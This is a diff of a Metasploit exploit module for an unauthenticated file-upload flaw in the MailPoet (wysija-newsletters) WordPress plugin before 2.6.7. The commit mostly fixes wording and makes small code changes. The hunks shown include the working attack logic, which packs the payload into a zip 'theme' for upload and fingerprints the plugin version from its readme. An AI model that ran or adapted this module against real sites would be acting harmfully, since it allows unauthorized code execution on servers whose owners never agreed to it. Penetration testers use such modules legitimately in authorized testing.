@@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload' ,
16
+ 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload' ,
17
17
'Description' => %q{
18
18
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
19
- is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
19
+ is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
20
20
functionality to upload a zip file containing the payload. The plugin used the
21
- admin_init hook without knowning the hook is also executed for unauthenticated
22
- users when calling the right URL.
21
+ admin_init hook, which is also executed for unauthenticated users when accessing
22
+ a specific URL.
23
23
} ,
24
24
'Author' =>
25
25
[
@@ -46,8 +46,8 @@ def create_zip_file(theme_name, payload_name)
46
46
# -) Additional files in the folder
47
47
48
48
content = {
49
- File . join ( theme_name , 'style.css' ) => '' ,
50
- File . join ( theme_name , payload_name ) => payload . encoded
49
+ :: File . join ( theme_name , 'style.css' ) => '' ,
50
+ :: File . join ( theme_name , payload_name ) => payload . encoded
51
51
}
52
52
53
53
zip_file = Rex ::Zip ::Archive . new
@@ -72,7 +72,7 @@ def check
72
72
# try to extract version from readme
73
73
# Example line:
74
74
# Stable tag: 2.6.6
75
- version = res . body [ /stable tag: ([^\r \n "\' ]+\. [^\r \n "\' ]+)/i , 1 ]
75
+ version = res . body . to_s [ /stable tag: ([^\r \n "\' ]+\. [^\r \n "\' ]+)/i , 1 ]
76
76
77
77
# readme present, but no version number
78
78
if version . nil?
@@ -132,4 +132,4 @@ def exploit
132
132
'method' => 'GET'
133
133
} )
134
134
end
135
- end
135
+ end
0 commit comments